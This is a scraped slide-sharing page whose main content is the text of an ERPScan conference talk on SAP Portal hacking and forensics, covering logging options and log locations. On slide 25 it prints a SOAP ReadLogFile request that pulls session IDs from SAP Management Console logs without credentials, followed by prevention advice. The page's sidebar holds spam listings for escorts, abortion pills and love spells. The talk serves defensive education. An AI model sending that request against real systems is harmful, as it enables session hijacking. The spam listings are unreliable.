Netherlands Tech Tour - 06 MySQL Enterprise MonitorNetherlands Tech Tour - 06 MySQL Enterprise Monitor
Netherlands Tech Tour - 06 MySQL Enterprise Monitor
Mark Swarbrick
 
How Pratt & Whitney Streamlined Their ABAP Security and Quality Code Review P...
How Pratt & Whitney Streamlined Their ABAP Security and Quality Code Review P...How Pratt & Whitney Streamlined Their ABAP Security and Quality Code Review P...
How Pratt & Whitney Streamlined Their ABAP Security and Quality Code Review P...
Virtual Forge
 
Alexey Tyurin - HR Hacking — bugs in PeopleSoft
Alexey Tyurin - HR Hacking — bugs in PeopleSoftAlexey Tyurin - HR Hacking — bugs in PeopleSoft
Alexey Tyurin - HR Hacking — bugs in PeopleSoft
DefconRussia
 
Breaking SAP portal (HashDays)
Breaking SAP portal (HashDays)Breaking SAP portal (HashDays)
Breaking SAP portal (HashDays)
ERPScan
 
Forgotten world - Corporate Business Application Systems
Forgotten world - Corporate Business Application SystemsForgotten world - Corporate Business Application Systems
Forgotten world - Corporate Business Application Systems
ERPScan
 

Weitere ähnliche Inhalte

Was ist angesagt?

CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to usCONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
PROIDEA
 
SAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big businessSAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big business
ERPScan
 
EAS-SEC Project
EAS-SEC ProjectEAS-SEC Project
EAS-SEC Project
ERPScan
 
Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)
ERPScan
 
Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC)
Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC) Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC)
Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC)
Onapsis Inc.
 
How Hackers can Open the Safe and Take the Jewels
How Hackers can Open the Safe and Take the JewelsHow Hackers can Open the Safe and Take the Jewels
How Hackers can Open the Safe and Take the Jewels
Onapsis Inc.
 
Blended Web and Database Attacks on Real Time In-memory Platforms
Blended Web and Database Attacks on Real Time In-memory PlatformsBlended Web and Database Attacks on Real Time In-memory Platforms
Blended Web and Database Attacks on Real Time In-memory Platforms
Onapsis Inc.
 
Attacks Based on Security Configurations
Attacks Based on Security ConfigurationsAttacks Based on Security Configurations
Attacks Based on Security Configurations
Onapsis Inc.
 
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP ForensicsOnapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis Inc.
 
Preventing Vulnerabilities in SAP HANA based Deployments
Preventing Vulnerabilities in SAP HANA based DeploymentsPreventing Vulnerabilities in SAP HANA based Deployments
Preventing Vulnerabilities in SAP HANA based Deployments
Onapsis Inc.
 
Alexey Tyurin - HR Hacking — bugs in PeopleSoft
Alexey Tyurin - HR Hacking — bugs in PeopleSoftAlexey Tyurin - HR Hacking — bugs in PeopleSoft
Alexey Tyurin - HR Hacking — bugs in PeopleSoft
DefconRussia
 

Was ist angesagt? (20)

CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to usCONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
 
SAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big businessSAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big business
 
Oracle PeopleSoft applications are under attacks (Hack in Paris)
Oracle PeopleSoft applications are under attacks (Hack in Paris)Oracle PeopleSoft applications are under attacks (Hack in Paris)
Oracle PeopleSoft applications are under attacks (Hack in Paris)
 
EAS-SEC: Framework for securing business applications
EAS-SEC: Framework for securing business applicationsEAS-SEC: Framework for securing business applications
EAS-SEC: Framework for securing business applications
 
EAS-SEC Project
EAS-SEC ProjectEAS-SEC Project
EAS-SEC Project
 
Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)
 
Penetration Testing SAP Systems
Penetration Testing SAP SystemsPenetration Testing SAP Systems
Penetration Testing SAP Systems
 
Cyber-attacks to SAP Systems
Cyber-attacks to SAP SystemsCyber-attacks to SAP Systems
Cyber-attacks to SAP Systems
 
Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC)
Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC) Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC)
Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC)
 
Your Crown Jewels Online: Further Attacks to SAP Web Applications (RSAConfe...
Your Crown Jewels Online: Further Attacks to SAP Web Applications (RSAConfe... Your Crown Jewels Online: Further Attacks to SAP Web Applications (RSAConfe...
Your Crown Jewels Online: Further Attacks to SAP Web Applications (RSAConfe...
 
How Hackers can Open the Safe and Take the Jewels
How Hackers can Open the Safe and Take the JewelsHow Hackers can Open the Safe and Take the Jewels
How Hackers can Open the Safe and Take the Jewels
 
Blended Web and Database Attacks on Real Time In-memory Platforms
Blended Web and Database Attacks on Real Time In-memory PlatformsBlended Web and Database Attacks on Real Time In-memory Platforms
Blended Web and Database Attacks on Real Time In-memory Platforms
 
A Holistic View on SAP Security Why Securing Production Systems Is Not Enough
A Holistic View on SAP Security Why Securing Production Systems Is Not Enough A Holistic View on SAP Security Why Securing Production Systems Is Not Enough
A Holistic View on SAP Security Why Securing Production Systems Is Not Enough
 
Attacks Based on Security Configurations
Attacks Based on Security ConfigurationsAttacks Based on Security Configurations
Attacks Based on Security Configurations
 
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP ForensicsOnapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
 
Preventing Vulnerabilities in SAP HANA based Deployments
Preventing Vulnerabilities in SAP HANA based DeploymentsPreventing Vulnerabilities in SAP HANA based Deployments
Preventing Vulnerabilities in SAP HANA based Deployments
 
Open APIs Design
Open APIs DesignOpen APIs Design
Open APIs Design
 
Netherlands Tech Tour - 06 MySQL Enterprise Monitor
Netherlands Tech Tour - 06 MySQL Enterprise MonitorNetherlands Tech Tour - 06 MySQL Enterprise Monitor
Netherlands Tech Tour - 06 MySQL Enterprise Monitor
 
How Pratt & Whitney Streamlined Their ABAP Security and Quality Code Review P...
How Pratt & Whitney Streamlined Their ABAP Security and Quality Code Review P...How Pratt & Whitney Streamlined Their ABAP Security and Quality Code Review P...
How Pratt & Whitney Streamlined Their ABAP Security and Quality Code Review P...
 
Alexey Tyurin - HR Hacking — bugs in PeopleSoft
Alexey Tyurin - HR Hacking — bugs in PeopleSoftAlexey Tyurin - HR Hacking — bugs in PeopleSoft
Alexey Tyurin - HR Hacking — bugs in PeopleSoft
 

Andere mochten auch

Forgotten world - Corporate Business Application Systems
Forgotten world - Corporate Business Application SystemsForgotten world - Corporate Business Application Systems
Forgotten world - Corporate Business Application Systems
ERPScan
 
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERPBusiness breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
ERPScan
 
Top 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAPTop 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAP
ERPScan
 
SAP security made easy
SAP security made easySAP security made easy
SAP security made easy
ERPScan
 

Andere mochten auch (13)

Breaking SAP portal (HashDays)
Breaking SAP portal (HashDays)Breaking SAP portal (HashDays)
Breaking SAP portal (HashDays)
 
Forgotten world - Corporate Business Application Systems
Forgotten world - Corporate Business Application SystemsForgotten world - Corporate Business Application Systems
Forgotten world - Corporate Business Application Systems
 
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERPBusiness breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
 
Top 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAPTop 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAP
 
SAP security made easy
SAP security made easySAP security made easy
SAP security made easy
 
The latest changes to SAP cybersecurity landscape
The latest changes to SAP cybersecurity landscapeThe latest changes to SAP cybersecurity landscape
The latest changes to SAP cybersecurity landscape
 
Practical pentesting of ERPs and business applications
Practical pentesting of ERPs and business applicationsPractical pentesting of ERPs and business applications
Practical pentesting of ERPs and business applications
 
Securing SAP in 5 steps
Securing SAP in 5 stepsSecuring SAP in 5 steps
Securing SAP in 5 steps
 
5 real ways to destroy business by breaking SAP applications
5 real ways to destroy business by breaking SAP applications5 real ways to destroy business by breaking SAP applications
5 real ways to destroy business by breaking SAP applications
 
Practical SAP pentesting (B-Sides San Paulo)
Practical SAP pentesting (B-Sides San Paulo)Practical SAP pentesting (B-Sides San Paulo)
Practical SAP pentesting (B-Sides San Paulo)
 
What CISOs should know about SAP security
What CISOs should know about SAP securityWhat CISOs should know about SAP security
What CISOs should know about SAP security
 
Practical SAP pentesting workshop (NullCon Goa)
Practical SAP pentesting workshop (NullCon Goa)Practical SAP pentesting workshop (NullCon Goa)
Practical SAP pentesting workshop (NullCon Goa)
 
Implementing SAP security in 5 steps
Implementing SAP security in 5 stepsImplementing SAP security in 5 steps
Implementing SAP security in 5 steps
 

Ähnlich wie SAP portal: breaking and forensicating

Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
ERPScan
 
SAP (In)Security: New and Best
SAP (In)Security: New and BestSAP (In)Security: New and Best
SAP (In)Security: New and Best
Positive Hack Days
 
01 demystifying mysq-lfororacledbaanddeveloperv1
01 demystifying mysq-lfororacledbaanddeveloperv101 demystifying mysq-lfororacledbaanddeveloperv1
01 demystifying mysq-lfororacledbaanddeveloperv1
Ivan Ma
 
Inception of the SAP Platform's Brain: Attacks on SAP Solution Manager
Inception of the SAP Platform's Brain: Attacks on SAP Solution ManagerInception of the SAP Platform's Brain: Attacks on SAP Solution Manager
Inception of the SAP Platform's Brain: Attacks on SAP Solution Manager
Onapsis Inc.
 
SAP Forensics Detecting White Collar Cyber-crime
SAP Forensics Detecting White Collar Cyber-crimeSAP Forensics Detecting White Collar Cyber-crime
SAP Forensics Detecting White Collar Cyber-crime
Onapsis Inc.
 

Ähnlich wie SAP portal: breaking and forensicating (20)

SAP (in)security: New and best
SAP (in)security: New and bestSAP (in)security: New and best
SAP (in)security: New and best
 
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
 
A crushing blow at the heart of SAP’s J2EE Engine.
A crushing blow at the heart of SAP’s J2EE Engine. A crushing blow at the heart of SAP’s J2EE Engine.
A crushing blow at the heart of SAP’s J2EE Engine.
 
SAP security in figures
SAP security in figuresSAP security in figures
SAP security in figures
 
SAP (In)Security: New and Best
SAP (In)Security: New and BestSAP (In)Security: New and Best
SAP (In)Security: New and Best
 
Architecture vulnerabilities in SAP platforms
Architecture vulnerabilities in SAP platformsArchitecture vulnerabilities in SAP platforms
Architecture vulnerabilities in SAP platforms
 
An easy way into your sap systems v3.0
An easy way into your sap systems v3.0An easy way into your sap systems v3.0
An easy way into your sap systems v3.0
 
ciso-platform-annual-summit-2013-New Framework for ERP Security
ciso-platform-annual-summit-2013-New Framework for ERP Securityciso-platform-annual-summit-2013-New Framework for ERP Security
ciso-platform-annual-summit-2013-New Framework for ERP Security
 
Attacking SAP users with sapsploit
Attacking SAP users with sapsploit Attacking SAP users with sapsploit
Attacking SAP users with sapsploit
 
01 demystifying mysq-lfororacledbaanddeveloperv1
01 demystifying mysq-lfororacledbaanddeveloperv101 demystifying mysq-lfororacledbaanddeveloperv1
01 demystifying mysq-lfororacledbaanddeveloperv1
 
How to manage and monitor large sql server estates
How to manage and monitor large sql server estatesHow to manage and monitor large sql server estates
How to manage and monitor large sql server estates
 
Onapsis SAP Backdoors
Onapsis SAP BackdoorsOnapsis SAP Backdoors
Onapsis SAP Backdoors
 
ERP Security. Myths, Problems, Solutions
ERP Security. Myths, Problems, SolutionsERP Security. Myths, Problems, Solutions
ERP Security. Myths, Problems, Solutions
 
OUTSYSTEMS AND SAP 2015
OUTSYSTEMS AND SAP 2015OUTSYSTEMS AND SAP 2015
OUTSYSTEMS AND SAP 2015
 
Exploiting Critical Attack Vectors to Gain Control of SAP Systems
Exploiting Critical Attack Vectors to Gain Control of SAP SystemsExploiting Critical Attack Vectors to Gain Control of SAP Systems
Exploiting Critical Attack Vectors to Gain Control of SAP Systems
 
Inception of the SAP Platform's Brain: Attacks on SAP Solution Manager
Inception of the SAP Platform's Brain: Attacks on SAP Solution ManagerInception of the SAP Platform's Brain: Attacks on SAP Solution Manager
Inception of the SAP Platform's Brain: Attacks on SAP Solution Manager
 
SAP Forensics Detecting White Collar Cyber-crime
SAP Forensics Detecting White Collar Cyber-crimeSAP Forensics Detecting White Collar Cyber-crime
SAP Forensics Detecting White Collar Cyber-crime
 
RPA Webinar Wise Men Solutions
RPA Webinar Wise Men SolutionsRPA Webinar Wise Men Solutions
RPA Webinar Wise Men Solutions
 
CON5451_Brydon-OOW2014_Brydon_CON5451 (1).pptx
CON5451_Brydon-OOW2014_Brydon_CON5451 (1).pptxCON5451_Brydon-OOW2014_Brydon_CON5451 (1).pptx
CON5451_Brydon-OOW2014_Brydon_CON5451 (1).pptx
 
Flopsar tesacom-technical-introduction v1a-eng
Flopsar tesacom-technical-introduction v1a-engFlopsar tesacom-technical-introduction v1a-eng
Flopsar tesacom-technical-introduction v1a-eng
 

Kürzlich hochgeladen

Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024
Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024
Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024
VictoriaMetrics
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
Delhi Call girls
 
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Medical / Health Care (+971588192166) Mifepristone and Misoprostol tablets 200mg
 
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) SolutionIntroducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
OnePlan Solutions
 
Harnessing ChatGPT - Elevating Productivity in Today's Agile Environment
Harnessing ChatGPT - Elevating Productivity in Today's Agile EnvironmentHarnessing ChatGPT - Elevating Productivity in Today's Agile Environment
Harnessing ChatGPT - Elevating Productivity in Today's Agile Environment
VictorSzoltysek
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Steffen Staab
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
Delhi Call girls
 
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
masabamasaba
 

Kürzlich hochgeladen (20)

Microsoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdfMicrosoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdf
 
Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024
Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024
Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024
 
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial Goals
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
%in Harare+277-882-255-28 abortion pills for sale in Harare
%in Harare+277-882-255-28 abortion pills for sale in Harare%in Harare+277-882-255-28 abortion pills for sale in Harare
%in Harare+277-882-255-28 abortion pills for sale in Harare
 
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
 
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park %in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
 
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdfPayment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
 
8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students
 
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) SolutionIntroducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
 
Harnessing ChatGPT - Elevating Productivity in Today's Agile Environment
Harnessing ChatGPT - Elevating Productivity in Today's Agile EnvironmentHarnessing ChatGPT - Elevating Productivity in Today's Agile Environment
Harnessing ChatGPT - Elevating Productivity in Today's Agile Environment
 
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview Questions
 
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
 
Announcing Codolex 2.0 from GDK Software
Announcing Codolex 2.0 from GDK SoftwareAnnouncing Codolex 2.0 from GDK Software
Announcing Codolex 2.0 from GDK Software
 
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension AidDirect Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
 
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
 

SAP portal: breaking and forensicating

  • 1. Invest  in  security   to  secure  investments   SAP  Portal:  Hacking   and  forensics   Dmitry  Chastukhin  –  Director  of  SAP  pentest/research  team   Evgeny  Neyolov  –  Security  analyst,  (an@)forensics  research  
  • 2. About  ERPScan   •  The   only   360-­‐degree   SAP   Security   solu=on   -­‐   ERPScan   Security   Monitoring  Suite  for  SAP   •  Leader  by  the  number  of  acknowledgements  from  SAP  (  150+  )   •  60+  presenta@ons  key  security  conferences  worldwide   •  25  Awards  and  nomina@ons   •  Research  team  -­‐  20  experts  with  experience  in    different  areas   of  security   •  Headquarters  in  Palo  Alto  (US)  and  Amsterdam  (EU)       2  
  • 3. Agenda   •  SAP  security   •  SAP  forensics  WTF?!   •  Say  hello  to  SAP  Portal   •  Breaking  SAP  Portal   •  Catch  me  if  you  can   •  Conclusion   3  
  • 4. SAP   •  The  most  popular  business  applica=on   •  More  than  180000  customers  worldwide     •  More  than  70%  of  Forbes  500  run  SAP   •  More  than  40%  of  ERP  market  in  Poland   4  
  • 5. SAP  security   Espionage   •  Stealing  financial  informa=on   •  Stealing  corporate  secrets   •  Stealing  supplier  and  customer  lists   •  Stealing  HR  data   Fraud   •  False  transac=ons   •  Modifica=on  of  master  data   Sabotage   •  Denial  of  service   •  Modifica=on  of  financial  reports   •  Access  to  technology  network  (SCADA)  by  trust  rela=ons   5  
  • 6. 0   5   10   15   20   25   30   35   2003   2004   2005   2006   2007   2008   2009   2010   2011   2012   2013   SAP  security   6   •  BlackHat   •  Defcon     •  HITB     •  RSA     •  CONFidence   •  DeepSec     •  Hack=vity   •  Troopers     •  Source   Source:  SAP  Security  in  Figures  2013   LINK  
  • 7. Is  it  remotely  exploitable?       5000+    non-­‐web  SAP  services  exposed  in  the  world    including  Dispatcher,  Message  server,  SapHostControl,  etc.     7   sapscan.com  
  • 8. 8   0   100   200   300   400   500   600   700   800   900   2001   2002   2003   2004   2005   2006   2007   2008   2009   2010   2011   2012   2013   2014   By  2014    -­‐  2800  SAP  Security  notes   SAP  Security  notes  
  • 9. What  about  other  services?   0 1 2 3 4 5 6 7 8 9 SAP Dispatcher SAP MMC SAP Message Server SAP HostControl SAP ITS Agate SAP Message Server httpd World 9  
  • 10. What  about  unpublished  threats?   •  Companies  are  not  interested  in  publishing  informa=on  about   their  breaches   •  There  are  a  lot  of  internal  breaches  thanks  to  unnecessarily   given  authoriza=ons  (An  employee  by  mistake  buys  hundreds  of   excavators  instead  of  ten)   •  There  are  known  stories  about  backdoors  leb  by  developers  in   custom  ABAP  code   •  How  can  you  be  sure  that,  if  a  breach  occurs,  you  can  find   evidence?   10  
  • 11. If  there  are  no  acacks,  it  doesn’t  mean  anything     •  Companies  don’t  like  to  share  it   •  Companies  don’t  use  security  audit  ~10%   •  Even  if  used,  nobody  manages  it  ~5%   •  Even  if  managed,  no  correla=on  ~1%   SAP  Forensics   11  
  • 12. Typical  SAP  audit  op@ons     •  ICM  log  icm/HTTP/logging_0    70%     •  Security  audit  log  in  ABAP    10%   •  Table  access  logging  rec/client    4%   •  Message  Server  log  ms/audit    2%   •  SAP  Gateway  access  log      2%   *  The  percentage  of  companies  is  based  on  our  security  assessments  and  product   implementa7ons.   12  
  • 13. What  do  we  see?   •  A  lot  of  research   •  Real  acacks   •  Lack  of  logging  prac=ce   •  Many  vulnerabili=es  are  hard  to  close  →  We  need  to  monitor   them,  at  least             13  
  • 14. What  do  we  need  to  monitor?     External  a_acks  on  SAP   14   *  Ideally,  we  should  control  everything,  but  this  talk  has  limits,  so  let’s  focus  on   the  most  cri7cal  areas.   • Awareness   Acack  users   and  SAP  GUI   • Secure configuration and patch management  SAProuter   • Disable them   Exposed  SAP   services     • Too  much  issues  and  custom  configura=on   • Can  be  0-­‐days   • Need  to  concentrate  on  this  area     SAP  Portal   and  WEB    
  • 15. •  Point  of  web  access     to  SAP  systems     •  Point  of  web  access  to     other  corporate  systems   •  Way  for  acackers     to  get  access  to  SAP     from  the  Internet   Say  hello  to  Portal   15  
  • 17. Okay,  okay.  SAP  Portal  is  important,  and   it  has  many  links  to  other  modules.     So  what?   17  
  • 18. SAP  Logging   “If  you  are  running  an  ABAP  +  Java  installa7on  of  Web  AS  with   SAP  Web  Dispatcher  as  a  load  balancing  solu7on,  you  can  safely   disable  logging  of  HTTP  requests  and  responses  on  J2EE  Engine,   and  use  the  corresponding  CLF  logs  of  SAP  Web  Dispatcher.  This   also  improves  the  HTTP  communica7on  performance.  The  only   drawback  of  using  the  Web  Dispatcher’s  CLF  logs  is  that  no   informa4on  is  available  about  the  user  execu4ng  the  request   (since  the  user  is  not  authen7cated  on  the  Web  Dispatcher,  but   on  the  J2EE  Engine  instead).“   SOURCE:  SAP  HELP     *Not  the  only….  There  are  many  complex  aTacks  with  POST  requests.   18  
  • 19. SAP  J2EE  Logging   •  Categories  of  system  events  recording:   –  System  –  all  system  related  security  and  administra=ve  logs   –  Applica=ons  –  all  system  events  related  to  business  logic   –  Performance  –  reserved  for  single  ac=vity  tracing     •  Default  loca=on  of  these  files  in  your  file  system:  usrsap <sid><id>j2eecluster<node>log 19  
  • 20. SAP  J2EE  Logging   •  The  developer  trace  files  of  the  Java  instance   <SID><instance name>work •  The  developer  trace  files  of  the  central  services   <SID><instance name>work <SID><instance name>log •  Java  server  logs   <SID><instance name>j2eeclusterserver<n>log 20  
  • 21. Full  logging  is  not  always  the  best  op@on   •  21  
  • 23. SAP  Management  Console   •  SAP  MMC:  centralized  system  management   •  SAP  MMC  has  remote  commands   •  Commands  are  simple  SOAP  requests   •  Allowing  to  see  the  trace  and  log  messages   •  It’s  not  bad  if  you  only  use  it  some=mes  and  delete  logs  aber   use,  but…   23  
  • 24. SAP  Management  Console           24   What  can  we  find  in  logs?   Right!   The  file  userinterface.log  contains  calculated  JSESIONID   But…   The  acacker  must  have  creden=als  to  read  the  log  file   WRONG!  
  • 25. SAP  Management  Console   25   <?xml version="1.0"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/ envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema"> <SOAP-ENV:Header> <sapsess:Session xmlns:sapsess="http://www.sap.com/webas/630/soap/ features/session/"> <enableSession>true</enableSession> </sapsess:Session> </SOAP-ENV:Header> <SOAP-ENV:Body> <ns1:ReadLogFile xmlns:ns1="urn:SAPControl"> <filename>j2ee/cluster/server0/log/system/userinterface.log</ filename> <filter/> <language/> <maxentries>%COUNT%</maxentries> <statecookie>EOF</statecookie> </ns1:ReadLogFile> </SOAP-ENV:Body> </SOAP-ENV:Envelope>
  • 26. Preven@on   26   LINK  to  SAP  HELP   •  Don’t  use  TRACE_LEVEL  =  3   •  Delete  traces  when  work  is  finished   •  Limit  access  to  dangerous  methods   •  Install  notes  927637  and  1439348   •  Mask  security-­‐sensi@ve  data  in  HTTP  access  log    
